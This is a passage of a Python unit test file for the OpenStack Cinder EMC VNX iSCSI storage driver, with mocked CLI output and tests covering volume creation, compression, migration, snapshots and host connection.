"SP Port ID: 4\n" +
"SP UID: iqn.1992-04.com.emc:cx." +
"fnm00124000215.b4\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: Not Applicable\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 2\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:62:08:60:01:95\n" +
"Link Status: Down\n" +
"Port Status: Online\n" +
"Switch Present: NO\n", 0)
def LUN_PROPERTY(self, name, isThin=False, hasSnap=False, size=1):
return """\
LOGICAL UNIT NUMBER 1
Name: %s
UID: 60:06:01:60:09:20:32:00:13:DF:B4:EF:C2:63:E3:11
Current Owner: SP A
Default Owner: SP A
Allocation Owner: SP A
Attached Snapshot: %s
User Capacity (Blocks): 2101346304
User Capacity (GBs): %d
Consumed Capacity (Blocks): 2149576704
Consumed Capacity (GBs): 1024.998
Pool Name: Pool_02_SASFLASH
Current State: Ready
Status: OK(0x0)
Is Faulted: false
Is Transitioning: false
Current Operation: None
Current Operation State: N/A
Current Operation Status: N/A
Current Operation Percent Completed: 0
Is Thin LUN: %s""" % (name,
'FakeSnap' if hasSnap else 'N/A',
size,
'Yes' if isThin else 'No'), 0
def STORAGE_GROUP_NO_MAP(self, sgname):
return ("""\
Storage Group Name: %s
Storage Group UID: 27:D2:BE:C1:9B:A2:E3:11:9A:8D:FF:E5:3A:03:FD:6D
Shareable: YES""" % sgname, 0)
def STORAGE_GROUP_HAS_MAP(self, sgname):
return ("""\
Storage Group Name: %s
Storage Group UID: 54:46:57:0F:15:A2:E3:11:9A:8D:FF:E5:3A:03:FD:6D
HBA/SP Pairs:
HBA UID SP Name SPPort
------- ------- ------
iqn.1993-08.org.debian:01:222 SP A 4
HLU/ALU Pairs:
HLU Number ALU Number
---------- ----------
1 1
Shareable: YES""" % sgname, 0)
class EMCVNXCLIDriverISCSITestCase(test.TestCase):
def setUp(self):
super(EMCVNXCLIDriverISCSITestCase, self).setUp()
self.stubs.Set(CommandLineHelper, 'command_execute',
self.succeed_fake_command_execute)
self.stubs.Set(CommandLineHelper, 'get_array_serial',
mock.Mock(return_value={'array_serial':
'fakeSerial'}))
self.stubs.Set(os.path, 'exists', mock.Mock(return_value=1))
self.stubs.Set(emc_vnx_cli, 'INTERVAL_5_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_30_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_60_SEC', 0.01)
self.configuration = conf.Configuration(None)
self.configuration.append_config_values = mock.Mock(return_value=0)
self.configuration.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
self.configuration.san_ip = '10.0.0.1'
self.configuration.storage_vnx_pool_name = 'unit_test_pool'
self.configuration.san_login = 'sysadmin'
self.configuration.san_password = 'sysadmin'
        # set the timeout to 0.0002 * 60 = 0.012s (12ms)
self.configuration.default_timeout = 0.0002
self.configuration.initiator_auto_registration = True
self.stubs.Set(self.configuration, 'safe_get', self.fake_safe_get)
self.testData = EMCVNXCLIDriverTestData()
self.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
self.configuration.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
def tearDown(self):
super(EMCVNXCLIDriverISCSITestCase, self).tearDown()
def driverSetup(self, commands=tuple(), results=tuple()):
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.Mock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
return fake_cli
def get_command_execute_simulator(self, commands=tuple(),
results=tuple()):
assert(len(commands) == len(results))
def fake_command_execute(*args, **kwargv):
for i in range(len(commands)):
if args == commands[i]:
if isinstance(results[i], list):
if len(results[i]) > 0:
ret = results[i][0]
del results[i][0]
return ret
else:
return results[i]
return self.standard_fake_command_execute(*args, **kwargv)
return fake_command_execute
def standard_fake_command_execute(self, *args, **kwargv):
standard_commands = [
self.testData.LUN_PROPERTY_ALL_CMD('vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('vol2'),
self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest'),
self.testData.LUN_PROPERTY_ALL_CMD('vol-vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('snapshot1'),
self.testData.POOL_PROPERTY_CMD]
standard_results = [
self.testData.LUN_PROPERTY('vol1'),
self.testData.LUN_PROPERTY('vol2'),
self.testData.LUN_PROPERTY('vol2_dest'),
self.testData.LUN_PROPERTY('vol-vol1'),
self.testData.LUN_PROPERTY('snapshot1'),
self.testData.POOL_PROPERTY]
standard_default = SUCCEED
for i in range(len(standard_commands)):
if args == standard_commands[i]:
return standard_results[i]
return standard_default
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_destroy_volume_without_extra_spec(self):
fake_cli = self.driverSetup()
self.driver.create_volume(self.testData.test_volume)
self.driver.delete_volume(self.testData.test_volume)
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1', 1,
'unit_test_pool',
'thick', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.LUN_DELETE_CMD('vol1'))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_compressed(self):
extra_specs = {'storagetype:provisioning': 'compressed'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'compressed', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(
1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_compressed_tiering_highestavailable(self):
extra_specs = {'storagetype:provisioning': 'compressed',
'storagetype:tiering': 'HighestAvailable'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'compressed', 'highestavailable')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(
1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_deduplicated(self):
extra_specs = {'storagetype:provisioning': 'deduplicated'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'deduplicated', None))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_tiering_auto(self):
extra_specs = {'storagetype:tiering': 'Auto'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
None, 'auto'))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_deduplicated_tiering_auto(self):
extra_specs = {'storagetype:tiering': 'Auto',
'storagetype:provisioning': 'Deduplicated'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
self.driverSetup(commands, results)
ex = self.assertRaises(
exception.VolumeBackendAPIException,
self.driver.create_volume,
self.testData.test_volume_with_type)
self.assertTrue(
re.match(r".*deduplicated and auto tiering can't be both enabled",
ex.msg))
def test_create_volume_compressed_no_enabler(self):
extra_specs = {'storagetype:provisioning': 'Compressed'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
('No package', 0)]
self.driverSetup(commands, results)
ex = self.assertRaises(
exception.VolumeBackendAPIException,
self.driver.create_volume,
self.testData.test_volume_with_type)
self.assertTrue(
re.match(r".*Compression Enabler is not installed",
ex.msg))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_compression_volume_on_array_backend(self):
"""Unit test for create a compression volume on array
backend.
"""
#Set up the array backend
config = conf.Configuration(None)
config.append_config_values = mock.Mock(return_value=0)
config.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
config.san_ip = '10.0.0.1'
config.san_login = 'sysadmin'
config.san_password = 'sysadmin'
config.default_timeout = 0.0002
config.initiator_auto_registration = True
config.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
config.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
self.driver = EMCCLIISCSIDriver(configuration=config)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliArray)
extra_specs = {'storagetype:provisioning': 'Compressed',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
self.driver.cli.stats['compression_support'] = 'True'
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'compressed', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(
1))]
fake_cli.assert_has_calls(expect_cmd)
def test_get_volume_stats(self):
#expect_result = [POOL_PROPERTY]
self.driverSetup()
stats = self.driver.get_volume_stats(True)
self.assertTrue(stats['driver_version'] is not None,
"dirver_version is not returned")
self.assertTrue(
stats['free_capacity_gb'] == 1000.6,
"free_capacity_gb is not correct")
self.assertTrue(
stats['reserved_percentage'] == 0,
"reserved_percentage is not correct")
self.assertTrue(
stats['storage_protocol'] == 'iSCSI',
"storage_protocol is not correct")
self.assertTrue(
stats['total_capacity_gb'] == 10000.5,
"total_capacity_gb is not correct")
self.assertTrue(
stats['vendor_name'] == "EMC",
"vender name is not correct")
self.assertTrue(
stats['volume_backend_name'] == "namedbackend",
"volume backend name is not correct")
self.assertTrue(stats['location_info'] == "unit_test_pool|fakeSerial")
self.assertTrue(
stats['driver_version'] == "04.01.00",
"driver version is incorrect.")
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(
side_effect=[1, 1]))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
def test_volume_migration_timeout(self):
commands = [self.testData.MIGRATION_CMD(),
self.testData.MIGRATION_VERIFY_CMD(1)]
FAKE_ERROR_MSG = """\
A network error occurred while trying to connect: '10.244.213.142'.
Message : Error occurred because connection refused. \
Unable to establish a secure connection to the Management Server.
"""
FAKE_ERROR_MSG = FAKE_ERROR_MSG.replace('\n', ' ')
FAKE_MIGRATE_PROPERTY = """\
Source LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d
Source LU ID: 63950
Dest LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d_dest
Dest LU ID: 136
Migration Rate: high
Current State: MIGRATED
Percent Complete: 100
Time Remaining: 0 second(s)
"""
results = [(FAKE_ERROR_MSG, 255),
[SUCCEED,
(FAKE_MIGRATE_PROPERTY, 0),
('The specified source LUN is not currently migrating',
23)]]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume,
fakehost)[0]
self.assertTrue(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(
return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(
side_effect=[1, 1]))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
def test_volume_migration(self):
commands = [self.testData.MIGRATION_CMD(),
self.testData.MIGRATION_VERIFY_CMD(1)]
FAKE_MIGRATE_PROPERTY = """\
Source LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d
Source LU ID: 63950
Dest LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d_dest
Dest LU ID: 136
Migration Rate: high
Current State: MIGRATED
Percent Complete: 100
Time Remaining: 0 second(s)
"""
results = [SUCCEED, [(FAKE_MIGRATE_PROPERTY, 0),
('The specified source LUN is not '
'currently migrating',
23)]]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume,
fakehost)[0]
self.assertTrue(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(
return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=5))
def test_volume_migration_02(self):
commands = [self.testData.MIGRATION_CMD(5, 5),
self.testData.MIGRATION_VERIFY_CMD(5)]
FAKE_MIGRATE_PROPERTY = """\
Source LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d
Source LU ID: 63950
Dest LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d_dest
Dest LU ID: 136
Migration Rate: high
Current State: MIGRATED
Percent Complete: 100
Time Remaining: 0 second(s)
"""
results = [SUCCEED, [(FAKE_MIGRATE_PROPERTY, 0),
('The specified source LUN is not '
'currently migrating',
23)]]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume5,
fakehost)[0]
self.assertTrue(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(5, 5),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(5)),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(5))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(
return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(
side_effect=[1, 1]))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
def test_volume_migration_failed(self):
commands = [self.testData.MIGRATION_CMD()]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume,
fakehost)[0]
self.assertFalse(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(),
retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
def test_create_destroy_volume_snapshot(self):
fake_cli = self.driverSetup()
#case
self.driver.create_snapshot(self.testData.test_snapshot)
self.driver.delete_snapshot(self.testData.test_snapshot)
#verification
expect_cmd = [mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.SNAP_CREATE_CMD('snapshot1')),
mock.call(*self.testData.SNAP_DELETE_CMD('snapshot1'))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"oslo_concurrency.processutils.execute",
mock.Mock(
return_value=(
"fakeportal iqn.1992-04.fake.com:fake.apm00123907237.a8", 0)))
@mock.patch("random.shuffle", mock.Mock())
def test_initialize_connection(self):
# Test for auto registration
self.configuration.initiator_auto_registration = True
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
self.testData.GETPORT_CMD(),
self.testData.PINGNODE_CMD('A', 4, 0, '10.0.0.2')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.ALL_PORTS,
self.testData.PING_OK]
fake_cli = self.driverSetup(commands, results)
connection_info = self.driver.initialize_connection(
self.testData.test_volume,
self.testData.connector)
self.assertEqual(connection_info,
self.testData.iscsi_connection_info_ro)
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-list'),
mock.call(*self.testData.GETPORT_CMD()),
mock.call('storagegroup', '-gname', 'fakehost', '-setpath',
'-hbauid', 'iqn.1993-08.org.debian:01:222',
'-sp', 'A', '-spport', 4, '-spvport', 0,
'-ip', '10.0.0.2', '-host', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call(*self.testData.GETPORT_CMD()),
mock.call(*self.testData.PINGNODE_CMD('A', 4, 0,
'10.0.0.2'))]
fake_cli.assert_has_calls(expected)
        # Test for manual registration
self.configuration.initiator_auto_registration = False
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
self.testData.CONNECTHOST_CMD('fakehost', 'fakehost'),
self.testData.GETPORT_CMD(),
self.testData.PINGNODE_CMD('A', 4, 0, '10.0.0.2')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
('', 0),
self.testData.ALL_PORTS,
self.testData.PING_OK]
fake_cli = self.driverSetup(commands, results)
connection_info = self.driver.initialize_connection(
self.testData.test_volume_rw,
self.testData.connector)
self.assertEqual(connection_info,
self.testData.iscsi_connection_info_rw)
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-connecthost',
'-host', 'fakehost', '-gname', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('connection', '-getport', '-address', '-vlanid')]
fake_cli.assert_has_calls(expected)
def test_terminate_connection(self):
os.path.exists = mock.Mock(return_value=1)
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
cli_helper = self.driver.cli._client
data = {'storage_group_name': "fakehost",
'storage_group_uid': "2F:D4:00:00:00:00:00:"
"00:00:00:FF:E5:3A:03:FD:6D",
'lunmap': {1: 16, 2: 88, 3: 47}}
cli_helper.get_storage_group = mock.Mock(
return_value=data)
lun_info = {'lun_name': "unit_test_lun",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.remove_hlu_from_storagegroup = mock.Mock()
self.driver.terminate_connection(self.testData.test_volume,
self.testData.connector)
cli_helper.remove_hlu_from_storagegroup.assert_called_once_with(
16, self.testData.connector["host"])
# expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
# mock.call('lun', '-list', '-name', 'vol1'),
# mock.call('storagegroup', '-list', '-gname', 'fakehost'),
# mock.call('lun', '-list', '-l', '10', '-owner')]
def test_create_volume_cli_failed(self):
commands = [self.testData.LUN_CREATION_CMD(
'failed_vol1', 1, 'unit_test_pool', None, None)]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(EMCVnxCLICmdError,
self.driver.create_volume,
self.testData.test_failed_volume)
expect_cmd = [mock.call(*self.testData.LUN_CREATION_CMD(
'failed_vol1', 1, 'unit_test_pool', None, None))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_snapshot_failed(self):
commands = [self.testData.SNAP_CREATE_CMD('failed_snapshot')]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
#case
self.assertRaises(EMCVnxCLICmdError,
self.driver.create_snapshot,
self.testData.test_failed_snapshot)
#verification
expect_cmd = [
mock.call(
*self.testData.LUN_PROPERTY_ALL_CMD(
'vol-vol1')),
mock.call(
*self.testData.SNAP_CREATE_CMD(
'failed_snapshot'))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_from_snapshot(self):
#set up
cmd_smp = ('lun', '-list', '-name', 'vol2', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol2
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol2_dest")
output_dest = self.testData.LUN_PROPERTY("vol2_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate, cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.driver.create_volume_from_snapshot(self.testData.test_volume2,
self.testData.test_snapshot)
expect_cmd = [
mock.call(
*self.testData.SNAP_MP_CREATE_CMD(
name='vol2', source='vol1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol2', snapName='snapshot1')),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol2_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol2', '-attachedSnapshot')]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_from_snapshot_sync_failed(self):
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol1
Attached Snapshot: fakesnap""", 0)
cmd_smp = ('lun', '-list', '-name', 'vol2', '-attachedSnapshot')
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol2_dest")
output_dest = self.testData.LUN_PROPERTY("vol2_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate, cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.testData.test_volume2,
self.testData.test_snapshot)
expect_cmd = [
mock.call(
*self.testData.SNAP_MP_CREATE_CMD(
name='vol2', source='vol1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol2', snapName='snapshot1')),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol2_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_cloned_volume(self):
cmd_smp = ('lun', '-list', '-name', 'vol1', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol1
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol1_dest")
output_dest = self.testData.LUN_PROPERTY("vol1_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate,
cmd_migrate_verify,
self.testData.NDU_LIST_CMD]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify,
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.create_cloned_volume(self.testData.test_volume,
self.testData.test_snapshot)
tmp_snap = 'tmp-snap-' + self.testData.test_volume['id']
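        # A temporary snapshot of the source LUN is created, attached to a
        # snap mount point, migrated into the destination LUN, and deleted.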
expect_cmd = [
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('snapshot1')),
mock.call(
*self.testData.SNAP_CREATE_CMD(tmp_snap)),
mock.call(*self.testData.SNAP_MP_CREATE_CMD(name='vol1',
source='snapshot1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol1', snapName=tmp_snap)),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
